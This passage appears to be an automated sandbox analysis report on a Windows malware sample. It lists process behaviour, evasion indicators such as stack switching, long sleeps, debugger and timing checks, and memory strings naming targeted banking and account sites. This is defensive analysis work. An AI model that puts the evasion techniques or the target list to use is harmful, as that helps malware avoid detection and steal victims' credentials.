                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\AppData\Roaming\cosses.exeAPI/Special instruction interceptor: Address: 16CBF2C
                  Source: C:\Windows\SysWOW64\calc.exeAPI/Special instruction interceptor: Address: 7FF84F7AD324
                  Source: C:\Windows\SysWOW64\calc.exeAPI/Special instruction interceptor: Address: 7FF84F7AD7E4
                  Source: C:\Windows\SysWOW64\calc.exeAPI/Special instruction interceptor: Address: 7FF84F7AD944
                  Source: C:\Windows\SysWOW64\calc.exeAPI/Special instruction interceptor: Address: 7FF84F7AD504
                  Source: C:\Windows\SysWOW64\calc.exeAPI/Special instruction interceptor: Address: 7FF84F7AD544
                  Source: C:\Windows\SysWOW64\calc.exeAPI/Special instruction interceptor: Address: 7FF84F7AD1E4
                  Source: C:\Windows\SysWOW64\calc.exeAPI/Special instruction interceptor: Address: 7FF84F7B0154
                  Source: C:\Windows\SysWOW64\calc.exeAPI/Special instruction interceptor: Address: 7FF84F7ADA44
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AD1C0 rdtsc 7_2_036AD1C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 9982Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7348Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2254Jump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeWindow / User API: threadDelayed 9836Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.dllJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\cosses.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-102338
                  Source: C:\Users\user\AppData\Roaming\cosses.exeAPI coverage: 4.8 %
                  Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
                  Source: C:\Windows\SysWOW64\calc.exeAPI coverage: 3.0 %
                  Source: C:\Windows\SysWOW64\mshta.exe TID: 8716Thread sleep count: 9982 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8860Thread sleep count: 7348 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8860Thread sleep count: 2254 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8908Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exe TID: 8256Thread sleep count: 136 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\calc.exe TID: 8256Thread sleep time: -272000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exe TID: 8256Thread sleep count: 9836 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\calc.exe TID: 8256Thread sleep time: -19672000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe TID: 8288Thread sleep time: -70000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe TID: 8288Thread sleep count: 41 > 30Jump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe TID: 8288Thread sleep time: -61500s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe TID: 8288Thread sleep count: 42 > 30Jump to behavior
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe TID: 8288Thread sleep time: -42000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\calc.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\calc.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_0017445A
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017C6D1 FindFirstFileW,FindClose,6_2_0017C6D1
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_0017C75C
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0017EF95
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0017F0F2
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0017F3F3
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_001737EF
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00173B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00173B12
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0017BCBC
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0324C760 FindFirstFileW,FindNextFileW,FindClose,12_2_0324C760
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_001149A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: 16d07F9.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817140197.00000000015C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
                  Source: 16d07F9.12.drBinary or memory string: discord.comVMware20,11696428655f
                  Source: 16d07F9.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: 16d07F9.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: 16d07F9.12.drBinary or memory string: global block list test formVMware20,11696428655
                  Source: 16d07F9.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: powershell.exe, 00000003.00000002.1481076364.000000000069E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1497317464.0000000007D3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: 16d07F9.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: 16d07F9.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: 16d07F9.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                  Source: 16d07F9.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: 16d07F9.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: 16d07F9.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: 16d07F9.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: 16d07F9.12.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: 16d07F9.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: calc.exe, 0000000C.00000002.3816500953.00000000033F5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.1975014267.0000025E963CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: 16d07F9.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: 16d07F9.12.drBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: 16d07F9.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: 16d07F9.12.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: 16d07F9.12.drBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: 16d07F9.12.drBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: 16d07F9.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: 16d07F9.12.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: 16d07F9.12.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: 16d07F9.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                  Source: 16d07F9.12.drBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: 16d07F9.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: 16d07F9.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: 16d07F9.12.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: 16d07F9.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: 16d07F9.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AD1C0 rdtsc 7_2_036AD1C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00417893 LdrLoadDll,7_2_00417893
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00183F09 BlockInput,6_2_00183F09
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00113B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00113B3A
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00145A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_00145A7C
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00114B37 LoadLibraryA,GetProcAddress,6_2_00114B37
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_016CC1F8 mov eax, dword ptr fs:[00000030h]6_2_016CC1F8
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_016CC198 mov eax, dword ptr fs:[00000030h]6_2_016CC198
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_016CAB78 mov eax, dword ptr fs:[00000030h]6_2_016CAB78
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EF367 mov eax, dword ptr fs:[00000030h]7_2_036EF367
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D437C mov eax, dword ptr fs:[00000030h]7_2_036D437C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03637370 mov eax, dword ptr fs:[00000030h]7_2_03637370
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03637370 mov eax, dword ptr fs:[00000030h]7_2_03637370
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03637370 mov eax, dword ptr fs:[00000030h]7_2_03637370
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362D34C mov eax, dword ptr fs:[00000030h]7_2_0362D34C
